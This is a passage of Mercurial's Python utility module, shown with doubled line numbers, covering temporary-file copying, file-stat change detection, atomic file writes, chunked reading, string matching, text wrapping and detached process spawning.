1895 1895 The permission bits are copied from the original file.
1896 1896
1897 1897 If the temporary file is going to be truncated immediately, you
1898 1898 can use emptyok=True as an optimization.
1899 1899
1900 1900 Returns the name of the temporary file.
1901 1901 """
1902 1902 d, fn = os.path.split(name)
1903 1903 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1904 1904 os.close(fd)
1905 1905 # Temporary files are created with mode 0600, which is usually not
1906 1906 # what we want. If the original file already exists, just copy
1907 1907 # its mode. Otherwise, manually obey umask.
1908 1908 copymode(name, temp, createmode)
1909 1909 if emptyok:
1910 1910 return temp
1911 1911 try:
1912 1912 try:
1913 1913 ifp = posixfile(name, "rb")
1914 1914 except IOError as inst:
1915 1915 if inst.errno == errno.ENOENT:
1916 1916 return temp
1917 1917 if not getattr(inst, 'filename', None):
1918 1918 inst.filename = name
1919 1919 raise
1920 1920 ofp = posixfile(temp, "wb")
1921 1921 for chunk in filechunkiter(ifp):
1922 1922 ofp.write(chunk)
1923 1923 ifp.close()
1924 1924 ofp.close()
1925 1925 except: # re-raises
1926 1926 try:
1927 1927 os.unlink(temp)
1928 1928 except OSError:
1929 1929 pass
1930 1930 raise
1931 1931 return temp
1932 1932
1933 1933 class filestat(object):
1934 1934 """help to exactly detect change of a file
1935 1935
1936 1936 'stat' attribute is result of 'os.stat()' if specified 'path'
1937 1937 exists. Otherwise, it is None. This can avoid preparative
1938 1938 'exists()' examination on client side of this class.
1939 1939 """
1940 1940 def __init__(self, stat):
1941 1941 self.stat = stat
1942 1942
1943 1943 @classmethod
1944 1944 def frompath(cls, path):
1945 1945 try:
1946 1946 stat = os.stat(path)
1947 1947 except OSError as err:
1948 1948 if err.errno != errno.ENOENT:
1949 1949 raise
1950 1950 stat = None
1951 1951 return cls(stat)
1952 1952
1953 1953 @classmethod
1954 1954 def fromfp(cls, fp):
1955 1955 stat = os.fstat(fp.fileno())
1956 1956 return cls(stat)
1957 1957
1958 1958 __hash__ = object.__hash__
1959 1959
1960 1960 def __eq__(self, old):
1961 1961 try:
1962 1962 # if ambiguity between stat of new and old file is
1963 1963 # avoided, comparison of size, ctime and mtime is enough
1964 1964 # to exactly detect change of a file regardless of platform
1965 1965 return (self.stat.st_size == old.stat.st_size and
1966 1966 self.stat.st_ctime == old.stat.st_ctime and
1967 1967 self.stat.st_mtime == old.stat.st_mtime)
1968 1968 except AttributeError:
1969 1969 pass
1970 1970 try:
1971 1971 return self.stat is None and old.stat is None
1972 1972 except AttributeError:
1973 1973 return False
1974 1974
1975 1975 def isambig(self, old):
1976 1976 """Examine whether new (= self) stat is ambiguous against old one
1977 1977
1978 1978 "S[N]" below means stat of a file at N-th change:
1979 1979
1980 1980 - S[n-1].ctime < S[n].ctime: can detect change of a file
1981 1981 - S[n-1].ctime == S[n].ctime
1982 1982 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1983 1983 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1984 1984 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1985 1985 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1986 1986
1987 1987 Case (*2) above means that a file was changed twice or more at
1988 1988 same time in sec (= S[n-1].ctime), and comparison of timestamp
1989 1989 is ambiguous.
1990 1990
1991 1991 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1992 1992 timestamp is ambiguous".
1993 1993
1994 1994 But advancing mtime only in case (*2) doesn't work as
1995 1995 expected, because naturally advanced S[n].mtime in case (*1)
1996 1996 might be equal to manually advanced S[n-1 or earlier].mtime.
1997 1997
1998 1998 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1999 1999 treated as ambiguous regardless of mtime, to avoid overlooking
2000 2000 by confliction between such mtime.
2001 2001
2002 2002 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2003 2003 S[n].mtime", even if size of a file isn't changed.
2004 2004 """
2005 2005 try:
2006 2006 return (self.stat.st_ctime == old.stat.st_ctime)
2007 2007 except AttributeError:
2008 2008 return False
2009 2009
2010 2010 def avoidambig(self, path, old):
2011 2011 """Change file stat of specified path to avoid ambiguity
2012 2012
2013 2013 'old' should be previous filestat of 'path'.
2014 2014
2015 2015 This skips avoiding ambiguity, if a process doesn't have
2016 2016 appropriate privileges for 'path'. This returns False in this
2017 2017 case.
2018 2018
2019 2019 Otherwise, this returns True, as "ambiguity is avoided".
2020 2020 """
2021 2021 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
2022 2022 try:
2023 2023 os.utime(path, (advanced, advanced))
2024 2024 except OSError as inst:
2025 2025 if inst.errno == errno.EPERM:
2026 2026 # utime() on the file created by another user causes EPERM,
2027 2027 # if a process doesn't have appropriate privileges
2028 2028 return False
2029 2029 raise
2030 2030 return True
2031 2031
2032 2032 def __ne__(self, other):
2033 2033 return not self == other
2034 2034
2035 2035 class atomictempfile(object):
2036 2036 '''writable file object that atomically updates a file
2037 2037
2038 2038 All writes will go to a temporary copy of the original file. Call
2039 2039 close() when you are done writing, and atomictempfile will rename
2040 2040 the temporary copy to the original name, making the changes
2041 2041 visible. If the object is destroyed without being closed, all your
2042 2042 writes are discarded.
2043 2043
2044 2044 checkambig argument of constructor is used with filestat, and is
2045 2045 useful only if target file is guarded by any lock (e.g. repo.lock
2046 2046 or repo.wlock).
2047 2047 '''
2048 2048 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2049 2049 self.__name = name # permanent name
2050 2050 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2051 2051 createmode=createmode)
2052 2052 self._fp = posixfile(self._tempname, mode)
2053 2053 self._checkambig = checkambig
2054 2054
2055 2055 # delegated methods
2056 2056 self.read = self._fp.read
2057 2057 self.write = self._fp.write
2058 2058 self.seek = self._fp.seek
2059 2059 self.tell = self._fp.tell
2060 2060 self.fileno = self._fp.fileno
2061 2061
2062 2062 def close(self):
2063 2063 if not self._fp.closed:
2064 2064 self._fp.close()
2065 2065 filename = localpath(self.__name)
2066 2066 oldstat = self._checkambig and filestat.frompath(filename)
2067 2067 if oldstat and oldstat.stat:
2068 2068 rename(self._tempname, filename)
2069 2069 newstat = filestat.frompath(filename)
2070 2070 if newstat.isambig(oldstat):
2071 2071 # stat of changed file is ambiguous to original one
2072 2072 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
2073 2073 os.utime(filename, (advanced, advanced))
2074 2074 else:
2075 2075 rename(self._tempname, filename)
2076 2076
2077 2077 def discard(self):
2078 2078 if not self._fp.closed:
2079 2079 try:
2080 2080 os.unlink(self._tempname)
2081 2081 except OSError:
2082 2082 pass
2083 2083 self._fp.close()
2084 2084
2085 2085 def __del__(self):
2086 2086 if safehasattr(self, '_fp'): # constructor actually did something
2087 2087 self.discard()
2088 2088
2089 2089 def __enter__(self):
2090 2090 return self
2091 2091
2092 2092 def __exit__(self, exctype, excvalue, traceback):
2093 2093 if exctype is not None:
2094 2094 self.discard()
2095 2095 else:
2096 2096 self.close()
2097 2097
2098 2098 def unlinkpath(f, ignoremissing=False):
2099 2099 """unlink and remove the directory if it is empty"""
2100 2100 if ignoremissing:
2101 2101 tryunlink(f)
2102 2102 else:
2103 2103 unlink(f)
2104 2104 # try removing directories that might now be empty
2105 2105 try:
2106 2106 removedirs(os.path.dirname(f))
2107 2107 except OSError:
2108 2108 pass
2109 2109
2110 2110 def tryunlink(f):
2111 2111 """Attempt to remove a file, ignoring ENOENT errors."""
2112 2112 try:
2113 2113 unlink(f)
2114 2114 except OSError as e:
2115 2115 if e.errno != errno.ENOENT:
2116 2116 raise
2117 2117
2118 2118 def makedirs(name, mode=None, notindexed=False):
2119 2119 """recursive directory creation with parent mode inheritance
2120 2120
2121 2121 Newly created directories are marked as "not to be indexed by
2122 2122 the content indexing service", if ``notindexed`` is specified
2123 2123 for "write" mode access.
2124 2124 """
2125 2125 try:
2126 2126 makedir(name, notindexed)
2127 2127 except OSError as err:
2128 2128 if err.errno == errno.EEXIST:
2129 2129 return
2130 2130 if err.errno != errno.ENOENT or not name:
2131 2131 raise
2132 2132 parent = os.path.dirname(os.path.abspath(name))
2133 2133 if parent == name:
2134 2134 raise
2135 2135 makedirs(parent, mode, notindexed)
2136 2136 try:
2137 2137 makedir(name, notindexed)
2138 2138 except OSError as err:
2139 2139 # Catch EEXIST to handle races
2140 2140 if err.errno == errno.EEXIST:
2141 2141 return
2142 2142 raise
2143 2143 if mode is not None:
2144 2144 os.chmod(name, mode)
2145 2145
2146 2146 def readfile(path):
2147 2147 with open(path, 'rb') as fp:
2148 2148 return fp.read()
2149 2149
2150 2150 def writefile(path, text):
2151 2151 with open(path, 'wb') as fp:
2152 2152 fp.write(text)
2153 2153
2154 2154 def appendfile(path, text):
2155 2155 with open(path, 'ab') as fp:
2156 2156 fp.write(text)
2157 2157
2158 2158 class chunkbuffer(object):
2159 2159 """Allow arbitrary sized chunks of data to be efficiently read from an
2160 2160 iterator over chunks of arbitrary size."""
2161 2161
2162 2162 def __init__(self, in_iter):
2163 2163 """in_iter is the iterator that's iterating over the input chunks."""
2164 2164 def splitbig(chunks):
2165 2165 for chunk in chunks:
2166 2166 if len(chunk) > 2**20:
2167 2167 pos = 0
2168 2168 while pos < len(chunk):
2169 2169 end = pos + 2 ** 18
2170 2170 yield chunk[pos:end]
2171 2171 pos = end
2172 2172 else:
2173 2173 yield chunk
2174 2174 self.iter = splitbig(in_iter)
2175 2175 self._queue = collections.deque()
2176 2176 self._chunkoffset = 0
2177 2177
2178 2178 def read(self, l=None):
2179 2179 """Read L bytes of data from the iterator of chunks of data.
2180 2180 Returns less than L bytes if the iterator runs dry.
2181 2181
2182 2182 If size parameter is omitted, read everything"""
2183 2183 if l is None:
2184 2184 return ''.join(self.iter)
2185 2185
2186 2186 left = l
2187 2187 buf = []
2188 2188 queue = self._queue
2189 2189 while left > 0:
2190 2190 # refill the queue
2191 2191 if not queue:
2192 2192 target = 2**18
2193 2193 for chunk in self.iter:
2194 2194 queue.append(chunk)
2195 2195 target -= len(chunk)
2196 2196 if target <= 0:
2197 2197 break
2198 2198 if not queue:
2199 2199 break
2200 2200
2201 2201 # The easy way to do this would be to queue.popleft(), modify the
2202 2202 # chunk (if necessary), then queue.appendleft(). However, for cases
2203 2203 # where we read partial chunk content, this incurs 2 dequeue
2204 2204 # mutations and creates a new str for the remaining chunk in the
2205 2205 # queue. Our code below avoids this overhead.
2206 2206
2207 2207 chunk = queue[0]
2208 2208 chunkl = len(chunk)
2209 2209 offset = self._chunkoffset
2210 2210
2211 2211 # Use full chunk.
2212 2212 if offset == 0 and left >= chunkl:
2213 2213 left -= chunkl
2214 2214 queue.popleft()
2215 2215 buf.append(chunk)
2216 2216 # self._chunkoffset remains at 0.
2217 2217 continue
2218 2218
2219 2219 chunkremaining = chunkl - offset
2220 2220
2221 2221 # Use all of unconsumed part of chunk.
2222 2222 if left >= chunkremaining:
2223 2223 left -= chunkremaining
2224 2224 queue.popleft()
2225 2225 # offset == 0 is enabled by block above, so this won't merely
2226 2226 # copy via ``chunk[0:]``.
2227 2227 buf.append(chunk[offset:])
2228 2228 self._chunkoffset = 0
2229 2229
2230 2230 # Partial chunk needed.
2231 2231 else:
2232 2232 buf.append(chunk[offset:offset + left])
2233 2233 self._chunkoffset += left
2234 2234 left -= chunkremaining
2235 2235
2236 2236 return ''.join(buf)
2237 2237
2238 2238 def filechunkiter(f, size=131072, limit=None):
2239 2239 """Create a generator that produces the data in the file size
2240 2240 (default 131072) bytes at a time, up to optional limit (default is
2241 2241 to read all data). Chunks may be less than size bytes if the
2242 2242 chunk is the last chunk in the file, or the file is a socket or
2243 2243 some other type of file that sometimes reads less data than is
2244 2244 requested."""
2245 2245 assert size >= 0
2246 2246 assert limit is None or limit >= 0
2247 2247 while True:
2248 2248 if limit is None:
2249 2249 nbytes = size
2250 2250 else:
2251 2251 nbytes = min(limit, size)
2252 2252 s = nbytes and f.read(nbytes)
2253 2253 if not s:
2254 2254 break
2255 2255 if limit:
2256 2256 limit -= len(s)
2257 2257 yield s
2258 2258
2259 2259 class cappedreader(object):
2260 2260 """A file object proxy that allows reading up to N bytes.
2261 2261
2262 2262 Given a source file object, instances of this type allow reading up to
2263 2263 N bytes from that source file object. Attempts to read past the allowed
2264 2264 limit are treated as EOF.
2265 2265
2266 2266 It is assumed that I/O is not performed on the original file object
2267 2267 in addition to I/O that is performed by this instance. If there is,
2268 2268 state tracking will get out of sync and unexpected results will ensue.
2269 2269 """
2270 2270 def __init__(self, fh, limit):
2271 2271 """Allow reading up to <limit> bytes from <fh>."""
2272 2272 self._fh = fh
2273 2273 self._left = limit
2274 2274
2275 2275 def read(self, n=-1):
2276 2276 if not self._left:
2277 2277 return b''
2278 2278
2279 2279 if n < 0:
2280 2280 n = self._left
2281 2281
2282 2282 data = self._fh.read(min(n, self._left))
2283 2283 self._left -= len(data)
2284 2284 assert self._left >= 0
2285 2285
2286 2286 return data
2287 2287
2288 2288 def stringmatcher(pattern, casesensitive=True):
2289 2289 """
2290 2290 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2291 2291 returns the matcher name, pattern, and matcher function.
2292 2292 missing or unknown prefixes are treated as literal matches.
2293 2293
2294 2294 helper for tests:
2295 2295 >>> def test(pattern, *tests):
2296 2296 ... kind, pattern, matcher = stringmatcher(pattern)
2297 2297 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2298 2298 >>> def itest(pattern, *tests):
2299 2299 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2300 2300 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2301 2301
2302 2302 exact matching (no prefix):
2303 2303 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2304 2304 ('literal', 'abcdefg', [False, False, True])
2305 2305
2306 2306 regex matching ('re:' prefix)
2307 2307 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2308 2308 ('re', 'a.+b', [False, False, True])
2309 2309
2310 2310 force exact matches ('literal:' prefix)
2311 2311 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2312 2312 ('literal', 're:foobar', [False, True])
2313 2313
2314 2314 unknown prefixes are ignored and treated as literals
2315 2315 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2316 2316 ('literal', 'foo:bar', [False, False, True])
2317 2317
2318 2318 case insensitive regex matches
2319 2319 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2320 2320 ('re', 'A.+b', [False, False, True])
2321 2321
2322 2322 case insensitive literal matches
2323 2323 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2324 2324 ('literal', 'ABCDEFG', [False, False, True])
2325 2325 """
2326 2326 if pattern.startswith('re:'):
2327 2327 pattern = pattern[3:]
2328 2328 try:
2329 2329 flags = 0
2330 2330 if not casesensitive:
2331 2331 flags = remod.I
2332 2332 regex = remod.compile(pattern, flags)
2333 2333 except remod.error as e:
2334 2334 raise error.ParseError(_('invalid regular expression: %s')
2335 2335 % e)
2336 2336 return 're', pattern, regex.search
2337 2337 elif pattern.startswith('literal:'):
2338 2338 pattern = pattern[8:]
2339 2339
2340 2340 match = pattern.__eq__
2341 2341
2342 2342 if not casesensitive:
2343 2343 ipat = encoding.lower(pattern)
2344 2344 match = lambda s: ipat == encoding.lower(s)
2345 2345 return 'literal', pattern, match
2346 2346
2347 2347 def shortuser(user):
2348 2348 """Return a short representation of a user name or email address."""
2349 2349 f = user.find('@')
2350 2350 if f >= 0:
2351 2351 user = user[:f]
2352 2352 f = user.find('<')
2353 2353 if f >= 0:
2354 2354 user = user[f + 1:]
2355 2355 f = user.find(' ')
2356 2356 if f >= 0:
2357 2357 user = user[:f]
2358 2358 f = user.find('.')
2359 2359 if f >= 0:
2360 2360 user = user[:f]
2361 2361 return user
2362 2362
2363 2363 def emailuser(user):
2364 2364 """Return the user portion of an email address."""
2365 2365 f = user.find('@')
2366 2366 if f >= 0:
2367 2367 user = user[:f]
2368 2368 f = user.find('<')
2369 2369 if f >= 0:
2370 2370 user = user[f + 1:]
2371 2371 return user
2372 2372
2373 2373 def email(author):
2374 2374 '''get email of author.'''
2375 2375 r = author.find('>')
2376 2376 if r == -1:
2377 2377 r = None
2378 2378 return author[author.find('<') + 1:r]
2379 2379
2380 2380 def ellipsis(text, maxlength=400):
2381 2381 """Trim string to at most maxlength (default: 400) columns in display."""
2382 2382 return encoding.trim(text, maxlength, ellipsis='...')
2383 2383
2384 2384 def unitcountfn(*unittable):
2385 2385 '''return a function that renders a readable count of some quantity'''
2386 2386
2387 2387 def go(count):
2388 2388 for multiplier, divisor, format in unittable:
2389 2389 if abs(count) >= divisor * multiplier:
2390 2390 return format % (count / float(divisor))
2391 2391 return unittable[-1][2] % count
2392 2392
2393 2393 return go
2394 2394
2395 2395 def processlinerange(fromline, toline):
2396 2396 """Check that linerange <fromline>:<toline> makes sense and return a
2397 2397 0-based range.
2398 2398
2399 2399 >>> processlinerange(10, 20)
2400 2400 (9, 20)
2401 2401 >>> processlinerange(2, 1)
2402 2402 Traceback (most recent call last):
2403 2403 ...
2404 2404 ParseError: line range must be positive
2405 2405 >>> processlinerange(0, 5)
2406 2406 Traceback (most recent call last):
2407 2407 ...
2408 2408 ParseError: fromline must be strictly positive
2409 2409 """
2410 2410 if toline - fromline < 0:
2411 2411 raise error.ParseError(_("line range must be positive"))
2412 2412 if fromline < 1:
2413 2413 raise error.ParseError(_("fromline must be strictly positive"))
2414 2414 return fromline - 1, toline
2415 2415
2416 2416 bytecount = unitcountfn(
2417 2417 (100, 1 << 30, _('%.0f GB')),
2418 2418 (10, 1 << 30, _('%.1f GB')),
2419 2419 (1, 1 << 30, _('%.2f GB')),
2420 2420 (100, 1 << 20, _('%.0f MB')),
2421 2421 (10, 1 << 20, _('%.1f MB')),
2422 2422 (1, 1 << 20, _('%.2f MB')),
2423 2423 (100, 1 << 10, _('%.0f KB')),
2424 2424 (10, 1 << 10, _('%.1f KB')),
2425 2425 (1, 1 << 10, _('%.2f KB')),
2426 2426 (1, 1, _('%.0f bytes')),
2427 2427 )
2428 2428
2429 2429 # Matches a single EOL which can either be a CRLF where repeated CR
2430 2430 # are removed or a LF. We do not care about old Macintosh files, so a
2431 2431 # stray CR is an error.
2432 2432 _eolre = remod.compile(br'\r*\n')
2433 2433
2434 2434 def tolf(s):
2435 2435 return _eolre.sub('\n', s)
2436 2436
2437 2437 def tocrlf(s):
2438 2438 return _eolre.sub('\r\n', s)
2439 2439
2440 2440 if pycompat.oslinesep == '\r\n':
2441 2441 tonativeeol = tocrlf
2442 2442 fromnativeeol = tolf
2443 2443 else:
2444 2444 tonativeeol = pycompat.identity
2445 2445 fromnativeeol = pycompat.identity
2446 2446
2447 2447 def escapestr(s):
2448 2448 # call underlying function of s.encode('string_escape') directly for
2449 2449 # Python 3 compatibility
2450 2450 return codecs.escape_encode(s)[0]
2451 2451
2452 2452 def unescapestr(s):
2453 2453 return codecs.escape_decode(s)[0]
2454 2454
2455 2455 def forcebytestr(obj):
2456 2456 """Portably format an arbitrary object (e.g. exception) into a byte
2457 2457 string."""
2458 2458 try:
2459 2459 return pycompat.bytestr(obj)
2460 2460 except UnicodeEncodeError:
2461 2461 # non-ascii string, may be lossy
2462 2462 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2463 2463
2464 2464 def uirepr(s):
2465 2465 # Avoid double backslash in Windows path repr()
2466 2466 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2467 2467
2468 2468 # delay import of textwrap
2469 2469 def MBTextWrapper(**kwargs):
2470 2470 class tw(textwrap.TextWrapper):
2471 2471 """
2472 2472 Extend TextWrapper for width-awareness.
2473 2473
2474 2474 Neither number of 'bytes' in any encoding nor 'characters' is
2475 2475 appropriate to calculate terminal columns for specified string.
2476 2476
2477 2477 Original TextWrapper implementation uses built-in 'len()' directly,
2478 2478 so overriding is needed to use width information of each characters.
2479 2479
2480 2480 In addition, characters classified into 'ambiguous' width are
2481 2481 treated as wide in East Asian area, but as narrow in other.
2482 2482
2483 2483 This requires use decision to determine width of such characters.
2484 2484 """
2485 2485 def _cutdown(self, ucstr, space_left):
2486 2486 l = 0
2487 2487 colwidth = encoding.ucolwidth
2488 2488 for i in xrange(len(ucstr)):
2489 2489 l += colwidth(ucstr[i])
2490 2490 if space_left < l:
2491 2491 return (ucstr[:i], ucstr[i:])
2492 2492 return ucstr, ''
2493 2493
2494 2494 # overriding of base class
2495 2495 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2496 2496 space_left = max(width - cur_len, 1)
2497 2497
2498 2498 if self.break_long_words:
2499 2499 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2500 2500 cur_line.append(cut)
2501 2501 reversed_chunks[-1] = res
2502 2502 elif not cur_line:
2503 2503 cur_line.append(reversed_chunks.pop())
2504 2504
2505 2505 # this overriding code is imported from TextWrapper of Python 2.6
2506 2506 # to calculate columns of string by 'encoding.ucolwidth()'
2507 2507 def _wrap_chunks(self, chunks):
2508 2508 colwidth = encoding.ucolwidth
2509 2509
2510 2510 lines = []
2511 2511 if self.width <= 0:
2512 2512 raise ValueError("invalid width %r (must be > 0)" % self.width)
2513 2513
2514 2514 # Arrange in reverse order so items can be efficiently popped
2515 2515 # from a stack of chucks.
2516 2516 chunks.reverse()
2517 2517
2518 2518 while chunks:
2519 2519
2520 2520 # Start the list of chunks that will make up the current line.
2521 2521 # cur_len is just the length of all the chunks in cur_line.
2522 2522 cur_line = []
2523 2523 cur_len = 0
2524 2524
2525 2525 # Figure out which static string will prefix this line.
2526 2526 if lines:
2527 2527 indent = self.subsequent_indent
2528 2528 else:
2529 2529 indent = self.initial_indent
2530 2530
2531 2531 # Maximum width for this line.
2532 2532 width = self.width - len(indent)
2533 2533
2534 2534 # First chunk on line is whitespace -- drop it, unless this
2535 2535 # is the very beginning of the text (i.e. no lines started yet).
2536 2536 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2537 2537 del chunks[-1]
2538 2538
2539 2539 while chunks:
2540 2540 l = colwidth(chunks[-1])
2541 2541
2542 2542 # Can at least squeeze this chunk onto the current line.
2543 2543 if cur_len + l <= width:
2544 2544 cur_line.append(chunks.pop())
2545 2545 cur_len += l
2546 2546
2547 2547 # Nope, this line is full.
2548 2548 else:
2549 2549 break
2550 2550
2551 2551 # The current line is full, and the next chunk is too big to
2552 2552 # fit on *any* line (not just this one).
2553 2553 if chunks and colwidth(chunks[-1]) > width:
2554 2554 self._handle_long_word(chunks, cur_line, cur_len, width)
2555 2555
2556 2556 # If the last chunk on this line is all whitespace, drop it.
2557 2557 if (self.drop_whitespace and
2558 2558 cur_line and cur_line[-1].strip() == r''):
2559 2559 del cur_line[-1]
2560 2560
2561 2561 # Convert current line back to a string and store it in list
2562 2562 # of all lines (return value).
2563 2563 if cur_line:
2564 2564 lines.append(indent + r''.join(cur_line))
2565 2565
2566 2566 return lines
2567 2567
2568 2568 global MBTextWrapper
2569 2569 MBTextWrapper = tw
2570 2570 return tw(**kwargs)
2571 2571
2572 2572 def wrap(line, width, initindent='', hangindent=''):
2573 2573 maxindent = max(len(hangindent), len(initindent))
2574 2574 if width <= maxindent:
2575 2575 # adjust for weird terminal size
2576 2576 width = max(78, maxindent + 1)
2577 2577 line = line.decode(pycompat.sysstr(encoding.encoding),
2578 2578 pycompat.sysstr(encoding.encodingmode))
2579 2579 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2580 2580 pycompat.sysstr(encoding.encodingmode))
2581 2581 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2582 2582 pycompat.sysstr(encoding.encodingmode))
2583 2583 wrapper = MBTextWrapper(width=width,
2584 2584 initial_indent=initindent,
2585 2585 subsequent_indent=hangindent)
2586 2586 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2587 2587
2588 2588 if (pyplatform.python_implementation() == 'CPython' and
2589 2589 sys.version_info < (3, 0)):
2590 2590 # There is an issue in CPython that some IO methods do not handle EINTR
2591 2591 # correctly. The following table shows what CPython version (and functions)
2592 2592 # are affected (buggy: has the EINTR bug, okay: otherwise):
2593 2593 #
2594 2594 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2595 2595 # --------------------------------------------------
2596 2596 # fp.__iter__ | buggy | buggy | okay
2597 2597 # fp.read* | buggy | okay [1] | okay
2598 2598 #
2599 2599 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2600 2600 #
2601 2601 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2602 2602 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2603 2603 #
2604 2604 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2605 2605 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2606 2606 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2607 2607 # fp.__iter__ but not other fp.read* methods.
2608 2608 #
2609 2609 # On modern systems like Linux, the "read" syscall cannot be interrupted
2610 2610 # when reading "fast" files like on-disk files. So the EINTR issue only
2611 2611 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2612 2612 # files approximately as "fast" files and use the fast (unsafe) code path,
2613 2613 # to minimize the performance impact.
2614 2614 if sys.version_info >= (2, 7, 4):
2615 2615 # fp.readline deals with EINTR correctly, use it as a workaround.
2616 2616 def _safeiterfile(fp):
2617 2617 return iter(fp.readline, '')
2618 2618 else:
2619 2619 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2620 2620 # note: this may block longer than necessary because of bufsize.
2621 2621 def _safeiterfile(fp, bufsize=4096):
2622 2622 fd = fp.fileno()
2623 2623 line = ''
2624 2624 while True:
2625 2625 try:
2626 2626 buf = os.read(fd, bufsize)
2627 2627 except OSError as ex:
2628 2628 # os.read only raises EINTR before any data is read
2629 2629 if ex.errno == errno.EINTR:
2630 2630 continue
2631 2631 else:
2632 2632 raise
2633 2633 line += buf
2634 2634 if '\n' in buf:
2635 2635 splitted = line.splitlines(True)
2636 2636 line = ''
2637 2637 for l in splitted:
2638 2638 if l[-1] == '\n':
2639 2639 yield l
2640 2640 else:
2641 2641 line = l
2642 2642 if not buf:
2643 2643 break
2644 2644 if line:
2645 2645 yield line
2646 2646
2647 2647 def iterfile(fp):
2648 2648 fastpath = True
2649 2649 if type(fp) is file:
2650 2650 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2651 2651 if fastpath:
2652 2652 return fp
2653 2653 else:
2654 2654 return _safeiterfile(fp)
2655 2655 else:
2656 2656 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2657 2657 def iterfile(fp):
2658 2658 return fp
2659 2659
2660 2660 def iterlines(iterator):
2661 2661 for chunk in iterator:
2662 2662 for line in chunk.splitlines():
2663 2663 yield line
2664 2664
2665 2665 def expandpath(path):
2666 2666 return os.path.expanduser(os.path.expandvars(path))
2667 2667
2668 2668 def hgcmd():
2669 2669 """Return the command used to execute current hg
2670 2670
2671 2671 This is different from hgexecutable() because on Windows we want
2672 2672 to avoid things opening new shell windows like batch files, so we
2673 2673 get either the python call or current executable.
2674 2674 """
2675 2675 if mainfrozen():
2676 2676 if getattr(sys, 'frozen', None) == 'macosx_app':
2677 2677 # Env variable set by py2app
2678 2678 return [encoding.environ['EXECUTABLEPATH']]
2679 2679 else:
2680 2680 return [pycompat.sysexecutable]
2681 2681 return gethgcmd()
2682 2682
2683 2683 def rundetached(args, condfn):
2684 2684 """Execute the argument list in a detached process.
2685 2685
2686 2686 condfn is a callable which is called repeatedly and should return
2687 2687 True once the child process is known to have started successfully.
2688 2688 At this point, the child process PID is returned. If the child
2689 2689 process fails to start or finishes before condfn() evaluates to
2690 2690 True, return -1.
2691 2691 """
2692 2692 # Windows case is easier because the child process is either
2693 2693 # successfully starting and validating the condition or exiting
2694 2694 # on failure. We just poll on its PID. On Unix, if the child
2695 2695 # process fails to start, it will be left in a zombie state until
2696 2696 # the parent wait on it, which we cannot do since we expect a long
2697 2697 # running process on success. Instead we listen for SIGCHLD telling
2698 2698 # us our child process terminated.
2699 2699 terminated = set()
2700 2700 def handler(signum, frame):
2701 2701 terminated.add(os.wait())
2702 2702 prevhandler = None
2703 2703 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2704 2704 if SIGCHLD is not None:
2705 2705 prevhandler = signal.signal(SIGCHLD, handler)
2706 2706 try:
2707 2707 pid = spawndetached(args)
2708 2708 while not condfn():
2709 2709 if ((pid in terminated or not testpid(pid))
2710 2710 and not condfn()):
2711 2711 return -1
2712 2712 time.sleep(0.1)
2713 2713 return pid
2714 2714 finally:
2715 2715 if prevhandler is not None:
2716 2716 signal.signal(signal.SIGCHLD, prevhandler)
2717 2717
2718 2718 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2719 2719 """Return the result of interpolating items in the mapping into string s.
2720 2720
2721 2721 prefix is a single character string, or a two character string with
2722 2722 a backslash as the first character if the prefix needs to be escaped in
2723 2723 a regular expression.
2724 2724
2725 2725 fn is an optional function that will be applied to the replacement text
2726 2726 just before replacement.
2727 2727
2728 2728 escape_prefix is an optional flag that allows using doubled prefix for
2729 2729 its escaping.
2730 2730 """
2731 2731 fn = fn or (lambda s: s)
2732 2732 patterns = '|'.join(mapping.keys())
2733 2733 if escape_prefix:
2734 2734 patterns += '|' + prefix
2735 2735 if len(prefix) > 1:
2736 2736 prefix_char = prefix[1:]
2737 2737 else:
2738 2738 prefix_char = prefix
2739 2739 mapping[prefix_char] = prefix_char
2740 2740 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2741 2741 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2742 2742
2743 2743 def getport(port):
2744 2744 """Return the port for a given network service.
2745 2745
